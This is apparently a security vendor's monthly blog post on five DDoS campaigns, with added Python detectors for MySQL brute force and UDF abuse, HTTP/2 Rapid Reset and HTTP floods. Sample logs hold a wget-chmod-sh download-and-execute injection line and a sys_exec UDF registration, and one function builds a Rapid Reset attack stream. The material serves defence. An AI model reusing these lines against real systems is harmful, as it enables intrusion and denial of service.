- Threat-a-licious - November 28, 2023
Top 5 Infamous DDoS Attacks Dominating the Cyber Landscape (November 2023)
At SISA, we understand the ever-evolving nature of cyber threats and the importance of staying one step ahead to protect your organization’s sensitive data and assets. Our dedicated team of experts is constantly monitoring various platforms, gathering intelligence, and analyzing the latest cyber threats to provide valuable insights into the latest cyber risks that can impact organizations.
This monthly post provides a condensed overview of the threats encountered throughout the month.
Our team brings you five infamous Distributed Denial-of-Service (DDoS) attacks that are dominating the cyber landscape: the Ddostf botnet exploiting MySQL servers, ChatGPT outages caused by Anonymous Sudan, a mysterious kill switch disrupting Mozi botnet operations, HTTP DDoS attacks leveraging the HTTP/2 Rapid Reset flaw, and the Mirai botnet adding 13 new exploits to its arsenal.
Read on to discover more…
1. Ddostf DDoS-as-a-Service botnet focuses on exploiting MySQL servers
The ‘Ddostf’ malware botnet is actively targeting MySQL servers, aiming to turn them into a DDoS-as-a-Service platform leased to cybercriminals. Researchers discovered the campaign during routine monitoring of threats to database servers. The operators compromise internet-exposed MySQL servers either by exploiting vulnerabilities in unpatched installations or by brute-forcing weak administrator credentials.
On Windows servers they abuse MySQL user-defined functions (UDFs): a malicious DLL is loaded with a CREATE FUNCTION ... SONAME statement, which gives the attacker command execution from SQL and is used to download payloads such as the Ddostf DDoS bot, install further malware, exfiltrate data, or plant backdoors. Once installed, Ddostf registers itself as a Windows system service for persistence and, unusually for a DDoS bot, can be instructed to switch to a new command-and-control (C2) address, which lets it survive takedowns of its current C2.
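To make the two intrusion steps described above visible in a server's own logs, here is an added detection example written for this post (it is not code from the Ddostf research or from MySQL). It scans MySQL error-log lines for bursts of failed logins from one host, and general-query-log lines for CREATE FUNCTION ... SONAME statements and any later call to the function so registered. The log lines, hosts, timestamps, thresholds and the sys_exec/udf.dll names are constructed for the example, and the regexes assume the MySQL 8 log layouts shown in the samples.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the shape of a MySQL 8 error log (log_error_verbosity=3).
# Six failures from one host in two seconds, one stray failure from another.
ERROR_LOG = """\
2023-11-20T10:15:31.000001Z 12 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.5' (using password: YES)
2023-11-20T10:15:31.400001Z 13 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.5' (using password: YES)
2023-11-20T10:15:31.800001Z 14 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.5' (using password: YES)
2023-11-20T10:15:32.200001Z 15 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.5' (using password: YES)
2023-11-20T10:15:32.600001Z 16 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.5' (using password: YES)
2023-11-20T10:15:33.000001Z 17 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.5' (using password: YES)
2023-11-20T11:02:10.000001Z 40 [Note] [MY-010926] [Server] Access denied for user 'app'@'198.51.100.7' (using password: YES)
"""

# Constructed sample in the shape of the general query log: a UDF is registered
# from a DLL and then called. The function and library names are made up.
GENERAL_LOG = """\
2023-11-20T10:16:02.000000Z    15 Connect   root@203.0.113.5 on  using TCP/IP
2023-11-20T10:16:03.000000Z    15 Query     SELECT @@version_compile_os, @@plugin_dir
2023-11-20T10:16:04.000000Z    15 Query     CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.dll'
2023-11-20T10:16:05.000000Z    15 Query     SELECT sys_exec('whoami')
2023-11-20T10:20:00.000000Z    16 Query     SELECT id FROM orders WHERE status = 'open'
"""

# "<ts> <thread> [label] [MY-nnnnnn] [Server] Access denied for user 'u'@'h'"
ACCESS_DENIED = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[\w+\]\s+\[MY-\d+\]\s+\[Server\]\s+"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)
# "<ts> <thread> Query <sql>"
GENERAL_QUERY = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")
# Loading a UDF from a shared library is the only way to get native code in via SQL.
CREATE_UDF = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(?P<name>\w+)`?\s+RETURNS\s+\w+\s+SONAME\s+'(?P<lib>[^']+)'",
    re.IGNORECASE,
)


def _ts(s):
    # Drop the trailing 'Z'; microsecond precision is what MySQL writes.
    return datetime.strptime(s[:26], "%Y-%m-%dT%H:%M:%S.%f")


def brute_force_sources(error_log, window_seconds=60, threshold=5):
    """Map host -> peak number of failed logins inside any window, for hosts over threshold."""
    failures = defaultdict(list)
    for line in error_log.splitlines():
        m = ACCESS_DENIED.match(line)
        if m:
            failures[m["host"]].append(_ts(m["ts"]))
    flagged = {}
    for host, times in failures.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[host] = peak
    return flagged


def udf_events(general_log):
    """List UDF registrations and every later call to a registered UDF, in log order."""
    registered, events = {}, []
    for line in general_log.splitlines():
        m = GENERAL_QUERY.match(line)
        if not m:
            continue
        sql = m["sql"]
        c = CREATE_UDF.search(sql)
        if c:
            registered[c["name"].lower()] = c["lib"]
            events.append({"conn": m["conn"], "kind": "create", "name": c["name"], "lib": c["lib"]})
            continue
        for name, lib in registered.items():
            if re.search(rf"\b{name}\s*\(", sql, re.IGNORECASE):
                events.append({"conn": m["conn"], "kind": "call", "name": name, "lib": lib})
    return events


if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(ERROR_LOG))
    for event in udf_events(GENERAL_LOG):
        print("UDF event:", event)
```

On a live server the same question can be asked directly: SELECT name, dl FROM mysql.func lists every registered UDF and the library it came from, and any entry you did not create yourself deserves the same treatment as the log hits above. Closing port 3306 to the internet and keeping secure_file_priv restrictive removes the two preconditions the campaign relies on.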
2. DDoS attacks behind recent ChatGPT outages, confirms OpenAI
OpenAI recently faced intermittent service disruptions caused by DDoS attacks on its API and ChatGPT, leaving users with errors such as “something seems to have gone wrong”. These disruptions followed a series of outages, including a major ChatGPT outage that affected its API, partial ChatGPT outages, and elevated error rates in DALL-E. OpenAI confirmed that the outages were due to an abnormal traffic pattern consistent with a DDoS attack but did not attribute them to any actor; the threat group Anonymous Sudan claimed responsibility.
The group cited OpenAI’s perceived bias towards Israel and against Palestine as its motivation. Anonymous Sudan said it used the SkyNet botnet, which now supports application-layer (Layer 7) attacks and was previously used in the June attacks on Microsoft services such as Outlook.com, OneDrive and the Azure Portal. Microsoft tracks the actor as Storm-1359 and described three kinds of Layer 7 DDoS it employs: HTTP(S) floods (large volumes of well-formed requests that exhaust application and backend resources), cache bypass (requests crafted with varying query strings or headers so that they miss the CDN cache and reach the origin), and Slowloris (many connections held open by sending request headers slowly, tying up the server’s connection pool).
3. Mysterious kill switch disrupts Mozi DDoS botnet operations
The Mozi botnet, a peer-to-peer malware that has been compromising IoT devices such as routers and DVRs for DDoS attacks since 2019, had already seen its activity decline when an unidentified party sent a kill switch payload that deactivated all bots in the network. Researchers observed the drop first in India and then in China, where Mozi originated. The kill switch consisted of eight UDP messages instructing the bots to download an update; that update terminated the Mozi process, disabled system services, replaced the original Mozi file, changed configuration and established a connection to a remote server, a carefully sequenced takedown.
An analysis noted striking similarities between the original Mozi code and the takedown binaries, raising speculation that the original creators or Chinese law enforcement were involved, although attribution remains unconfirmed. Despite Mozi’s demise, DDoS malware botnets continue to target vulnerable IoT devices, which keeps device security a standing priority.
4. 100 million RPS DDoS attack exploits HTTP/2 Rapid Reset flaw
Cloudflare mitigated thousands of hyper-volumetric HTTP DDoS attacks leveraging the newly disclosed HTTP/2 Rapid Reset flaw, 89 of which exceeded 100 million requests per second (RPS). The vulnerability (CVE-2023-44487) was disclosed jointly by AWS, Cloudflare and Google after they observed record-breaking attacks against their services; Fastly also reported a Rapid Reset attack that peaked at 250 million RPS and lasted about three minutes. The flaw abuses HTTP/2 stream multiplexing: a client opens a stream with a HEADERS frame and immediately cancels it with RST_STREAM, so the request never counts against the server’s concurrent-stream limit while the server still spends resources processing it. This campaign drove a 65% quarter-over-quarter increase in HTTP DDoS attack requests in Q3, to 8.9 trillion from 5.4 trillion in Q2 2023 and 4.7 trillion in Q1 2023.
Because each cancelled stream costs the attacker almost nothing, botnets built on cloud virtual machines rather than IoT devices can generate up to 5,000 times more force per node, which is what made attacks of this scale possible; gaming, IT, cryptocurrency, software and telecom were among the most affected industries. The U.S., China, Brazil, Germany and Indonesia were the main sources of application-layer (L7) DDoS traffic, while the U.S., Singapore, China, Vietnam and Canada were the primary targets of HTTP DDoS attacks.
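An added example, written for this post and not taken from Cloudflare, Google, AWS or any HTTP/2 server implementation, that shows why Rapid Reset slips past the usual SETTINGS_MAX_CONCURRENT_STREAMS limit and how a reset budget catches it. It encodes and parses raw HTTP/2 frames, builds the client side of a HEADERS/RST_STREAM burst, and runs both it and a benign burst through a small per-connection guard. The guard's default budget of twice the concurrent-stream limit per 1,000 inbound frames is an assumed value for illustration, not a value taken from any vendor's patch.

```python
import struct

# Frame type and flag constants from RFC 9113 (HTTP/2) and RFC 7541 (HPACK).
HEADERS, RST_STREAM, SETTINGS = 0x1, 0x3, 0x4
END_HEADERS = 0x4
CANCEL = 0x8                        # RST_STREAM error code the attack sends
PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
GET_INDEXED = b"\x82"               # HPACK static-table index 2: ':method: GET'


def frame(ftype, flags, stream_id, payload=b""):
    """Encode one frame: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id."""
    header = struct.pack("!I", len(payload))[1:] + bytes([ftype, flags])
    return header + struct.pack("!I", stream_id & 0x7FFFFFFF) + payload


def parse_frames(data):
    """Yield (type, flags, stream_id, payload) tuples from a raw client byte stream."""
    if data.startswith(PREFACE):
        data = data[len(PREFACE):]
    off = 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        sid = int.from_bytes(data[off + 5:off + 9], "big") & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) < length:
            raise ValueError("truncated frame")
        yield ftype, flags, sid, payload
        off += 9 + length


class RapidResetGuard:
    """Per-connection stream accounting. The classic control is the concurrent
    stream limit; the Rapid Reset control is a budget of RST_STREAMs the client
    may send per window of inbound frames. Budget and window are assumed values."""

    def __init__(self, max_concurrent=100, reset_budget=None, window=1000):
        self.max_concurrent = max_concurrent
        self.reset_budget = reset_budget if reset_budget is not None else 2 * max_concurrent
        self.window = window
        self.open, self.resets, self.frames_seen, self.peak_open = set(), 0, 0, 0

    def feed(self, ftype, flags, sid, payload):
        """Return 'REFUSED_STREAM', 'GOAWAY' or None for one inbound frame."""
        self.frames_seen += 1
        if ftype == HEADERS and sid % 2 == 1:          # client-initiated streams are odd
            self.open.add(sid)
            self.peak_open = max(self.peak_open, len(self.open))
            if len(self.open) > self.max_concurrent:
                return "REFUSED_STREAM"                # too many streams open at once
        elif ftype == RST_STREAM:
            self.open.discard(sid)                     # the cancel frees the slot...
            self.resets += 1                           # ...but the server already did the work
            if self.resets > self.reset_budget:
                return "GOAWAY"                        # cancelling faster than any real client
        if self.frames_seen >= self.window:            # roll the reset window
            self.frames_seen, self.resets = 0, 0
        return None


def rapid_reset_burst(n):
    """Attacker's byte stream: n streams, each opened and cancelled back to back."""
    out = bytearray(PREFACE) + frame(SETTINGS, 0, 0)
    for i in range(n):
        sid = 2 * i + 1
        out += frame(HEADERS, END_HEADERS, sid, GET_INDEXED)
        out += frame(RST_STREAM, 0, sid, struct.pack("!I", CANCEL))
    return bytes(out)


def benign_burst(n):
    """A greedy but honest client: n streams opened, none cancelled."""
    out = bytearray(PREFACE) + frame(SETTINGS, 0, 0)
    for i in range(n):
        out += frame(HEADERS, END_HEADERS, 2 * i + 1, GET_INDEXED)
    return bytes(out)


def inspect_connection(data, **guard_args):
    """Run a byte stream through the guard; report the verdict and when it fired."""
    guard = RapidResetGuard(**guard_args)
    for idx, f in enumerate(parse_frames(data)):
        verdict = guard.feed(*f)
        if verdict:
            return {"verdict": verdict, "frame_index": idx, "peak_open": guard.peak_open}
    return {"verdict": "OK", "frame_index": None, "peak_open": guard.peak_open}


if __name__ == "__main__":
    print("rapid reset x500:", inspect_connection(rapid_reset_burst(500), max_concurrent=100))
    print("benign x500:    ", inspect_connection(benign_burst(500), max_concurrent=100))
    print("benign x50:     ", inspect_connection(benign_burst(50), max_concurrent=100))
```

The point to notice is peak_open: five hundred attack streams never push it above 1, so the concurrent-stream limit alone sees a perfectly polite client, while the reset budget closes the connection after the 201st cancel. Real fixes (nginx, Go's net/http, the big CDNs) differ in where they draw the line, but they all add some form of this second counter; the honest client that opens 500 streams at once is still stopped by the first, unchanged limit.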
5. Mirai DDoS malware variant expands targets with 13 router exploits
The IZ1H9 variant of the Mirai botnet has expanded its functionality with 13 new exploit payloads targeting a wide range of Linux-based IoT devices such as routers and IP cameras. The exploits aim at vulnerabilities in products from D-Link, TP-Link (including the Archer line), Zyxel, Netis, Sunhillo SureLine, Geutebruck, Yealink Device Management, Korenix JetWave, and TOTOLINK.
The vulnerabilities date from 2015 to 2023 and are predominantly command-execution flaws, among them those in D-Link and Geutebruck devices, Netis WF2419 (CVE-2019-19356), Korenix JetWave (CVE-2023-23295), Sunhillo SureLine (CVE-2021-36380), and a series of command-injection bugs in TOTOLINK routers. Once a device is exploited, the injected payload makes it fetch and execute a shell-script downloader, which erases logs to hide its presence and then installs the bot clients. The bots connect to a command-and-control server and can launch UDP, UDP Plain, HTTP flood, and TCP SYN flood attacks.
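The following added detection example, written for this post and not taken from Microsoft's, Fortinet's or any vendor's tooling, serves both the Layer 7 attack types named in item 2 and the injection payloads described here in item 5. It parses combined-format access log lines and reports (a) clients with an abnormal per-second request rate (HTTP(S) flood), (b) clients that hit one path with a fresh query string on nearly every request (cache bypass), and (c) requests whose decoded parameters carry a download-and-execute cradle of the wget/chmod/sh shape that Mirai-family droppers inject. The IP addresses, the /cgi-bin/example.cgi endpoint, the thresholds and every log line are constructed. Slowloris is deliberately absent: its connections never complete a request and so never reach an access log, so it has to be caught at the connection layer (header timeouts, per-IP connection limits) instead.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import unquote_plus, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Download-and-execute cradle: a fetch tool plus a chmod, a sh invocation,
# a /tmp working directory or a log wipe, all inside one request parameter.
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget|busybox)\b", re.IGNORECASE)
EXEC_RE = re.compile(r"\bchmod\b|\bsh\s+\S|/tmp/|\brm\s+-r?f\b.*log", re.IGNORECASE)


def _line(ip, ts, target, status=200):
    """Build one constructed access-log line."""
    return f'{ip} - - [{ts}] "GET {target} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample: a flood source, a cache-bypass source, a normal visitor,
# and one command-injection attempt against a hypothetical CGI endpoint.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.10", "20/Nov/2023:10:15:31 +0000", "/") for _ in range(40)]
    + [_line("198.51.100.20", f"20/Nov/2023:10:15:{31 + i // 10:02d} +0000", f"/index.html?cb={i}")
       for i in range(25)]
    + [_line("192.0.2.7", "20/Nov/2023:10:15:32 +0000", "/about") for _ in range(5)]
    + [_line("198.51.100.99", "20/Nov/2023:10:15:33 +0000",
             "/cgi-bin/example.cgi?cmd=cd%20/tmp;wget%20http://203.0.113.77/i.sh;chmod%20777%20i.sh;sh%20i.sh",
             404)]
)


def parse_access_log(text):
    """Turn log lines into dicts with ip, timestamp, path and raw query string."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        parts = urlsplit(m["target"])
        entries.append({"ip": m["ip"], "ts": ts, "path": parts.path, "query": parts.query})
    return entries


def flood_sources(entries, rps_threshold=30):
    """Peak requests per second per client IP; return the IPs at or over the threshold."""
    per_second = Counter((e["ip"], e["ts"].replace(microsecond=0)) for e in entries)
    peak = {}
    for (ip, _), n in per_second.items():
        peak[ip] = max(peak.get(ip, 0), n)
    return {ip: n for ip, n in peak.items() if n >= rps_threshold}


def cache_bypass_sources(entries, min_requests=20, unique_ratio=0.9):
    """Clients hitting one path with a distinct query string almost every time:
    each such request misses the cache and lands on the origin."""
    seen = defaultdict(lambda: defaultdict(set))
    counts = Counter()
    for e in entries:
        if e["query"]:
            seen[e["ip"]][e["path"]].add(e["query"])
            counts[(e["ip"], e["path"])] += 1
    flagged = {}
    for (ip, path), n in counts.items():
        uniq = len(seen[ip][path])
        if n >= min_requests and uniq / n >= unique_ratio:
            flagged[ip] = {"path": path, "requests": n, "unique_queries": uniq}
    return flagged


def injection_cradles(entries):
    """Requests whose URL-decoded target contains a fetch-then-execute sequence."""
    hits = []
    for e in entries:
        decoded = unquote_plus(e["path"] + ("?" + e["query"] if e["query"] else ""))
        if FETCH_RE.search(decoded) and EXEC_RE.search(decoded):
            hits.append({"ip": e["ip"], "path": e["path"], "decoded": decoded})
    return hits


if __name__ == "__main__":
    entries = parse_access_log(SAMPLE_LOG)
    print("flood sources:", flood_sources(entries))
    print("cache bypass:", cache_bypass_sources(entries))
    print("injection cradles:", injection_cradles(entries))
```

Because the downloader wipes the device's own logs, the injection check is only useful when run on logs the device does not control: a reverse proxy, WAF or gateway in front of the management interface, or a mirror of the traffic. The two rate checks belong in the same place, upstream of the origin, where the request can still be dropped.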
Key recommendations to combat cyber risks
- Enroll in a cloud-based DDoS mitigation service and develop DDoS response and business continuity plans.
- Enforce strong and unique passwords for administrator accounts to defend against brute-force and dictionary attacks.
- Regularly update the firmware on IoT devices. Manufacturers often release patches to address vulnerabilities, so keeping the devices up to date is crucial.
- Implement robust monitoring to detect and respond to unauthorized access attempts, and regularly audit server access logs.
- Implement network segmentation to restrict the lateral movement of malware within the network, isolating critical systems from potential threats.
- Deploy robust endpoint protection solutions to detect and mitigate malware infections on both Linux and Windows systems.
- Install reputable security software on the devices, including antivirus and anti-malware programs, to provide an additional layer of protection.
- Frequently back up data to mitigate the impact of a potential attack. Ensure that backups are stored securely and are regularly tested for restoration.
- Conduct routine vulnerability assessments and scans to identify potential weaknesses in network and devices.
- Conduct a DDoS tabletop exercise and/or regularly test your DDoS response plan.
To get updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories or check out SISA Weekly Threat Watch on our website.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.